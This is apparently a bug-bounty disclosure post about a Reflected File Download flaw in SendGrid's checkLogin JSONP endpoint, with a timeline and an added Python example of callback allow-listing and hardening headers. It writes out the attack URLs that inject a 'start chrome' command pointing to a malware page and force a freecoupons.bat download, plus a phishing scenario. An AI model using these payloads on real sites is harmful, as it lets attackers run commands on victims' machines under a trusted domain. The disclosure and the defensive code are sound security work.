For those who don't know who SendGrid is, their own site describes them like this:
"SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber."
They send over 19 billion emails per month.
When visiting their site I noticed an XHR request in Chrome's inspector that caught my attention:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565&_=1439389801826
It returned the following JSONP response:
/**/jQuery171016384647646918893_1439389801565({"status":"success","logged_in":false});
I noticed that the callback name was taken straight from the URL and reflected into the response body, so I injected my RFD vector:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||
Which was reflected as:
/**/||start chrome websegura.net/malware.htm||({"status":"success","logged_in":false});
Now that I could reflect my payload, I removed the parameters that weren't needed for the proof-of-concept and tried to control the filename without triggering an HTTP error:
https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||
For Internet Explorer 8 and 9 you didn't need anything else: opening this last URL would automatically prompt to download a freecoupons.bat file from sendgrid.com's servers.
On other modern browsers you needed the HTML5 download attribute; the download would start just by clicking the image.
A malicious user could:
- Launch a malicious campaign with the specially crafted page offering SendGrid.com coupon codes
- The victim downloads the file thinking that it comes from a trusted domain [SendGrid.com]
- The malicious user gains control over the victim's machine
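The root cause is a JSONP endpoint that echoes an unvalidated callback name and accepts extra path segments after checkLogin, which together let the URL choose both the file's content and its name. As an added example that is not part of the original post or of SendGrid's code, the Python below shows the three server-side controls usually recommended against Reflected File Download: an allow-list for the callback identifier (only the first callback= value is honoured), an exact path match so trailing segments like /freecoupons.bat are refused, and response headers (Content-Type, X-Content-Type-Options: nosniff, and a Content-Disposition with a fixed filename) so that a browser which does save the response never names the file after the URL. The endpoint path constant, header values and sample inputs are assumptions made for this example.

```python
import json
import re
from urllib.parse import parse_qs

# Allowed JSONP callback: a dotted JavaScript identifier such as
# "jQuery171016384647646918893_1439389801565" or "app.onLogin".
# Shell metacharacters, quotes, spaces and pipes cannot match.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$", re.ASCII)
MAX_CALLBACK_LEN = 128
# Assumed exact path for the endpoint (hypothetical, modelled on the post).
ENDPOINT = "/user/checkLogin"


def validate_callback(name):
    """Return the callback name if it is a safe identifier, otherwise None."""
    if not name or len(name) > MAX_CALLBACK_LEN:
        return None
    return name if CALLBACK_RE.fullmatch(name) else None


def build_jsonp_response(path, query, data):
    """Build (status, headers, body) for a JSONP endpoint hardened against RFD.

    - path must equal ENDPOINT exactly, so "/user/checkLogin/freecoupons.bat"
      is refused and the requester cannot pick the downloaded filename.
    - only the first callback= value is used and it must pass the allow-list.
    - the body is served as JavaScript with nosniff and a fixed
      Content-Disposition filename.
    """
    if path != ENDPOINT:
        return 404, {}, ""
    params = parse_qs(query, keep_blank_values=True)
    callback = validate_callback((params.get("callback") or [None])[0])
    if callback is None:
        return (400,
                {"Content-Type": "application/json"},
                json.dumps({"error": "invalid callback"}))
    # The leading /**/ comment is kept, as in the original response.
    body = "/**/%s(%s);" % (callback, json.dumps(data, separators=(",", ":")))
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'inline; filename="checkLogin.js"',
    }
    return 200, headers, body


if __name__ == "__main__":
    # Constructed sample requests: a legitimate one and two shaped like the post's.
    sample = {"status": "success", "logged_in": False}
    print(build_jsonp_response(ENDPOINT, "callback=mycallback&callback=||start x||", sample))
    print(build_jsonp_response(ENDPOINT, "callback=||start x||", sample))
    print(build_jsonp_response(ENDPOINT + "/freecoupons.bat", "callback=mycallback", sample))
```

The callback check deliberately rejects rather than sanitises: stripping characters from an attacker-chosen name still lets the attacker shape the response, whereas an allow-list keeps the body to exactly what a legitimate jQuery-style caller would produce.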
SendGrid were always on top of the issue [cool guys] and they were nice enough to send me an awesome t-shirt 🙂
Timeline:
- 12-08-2015 Reported this security issue to SendGrid
- 20-08-2015 SendGrid replied that they were fixing the issue
- 29-09-2015 Asked for an update
- 27-10-2015 SendGrid reported that the issue was fixed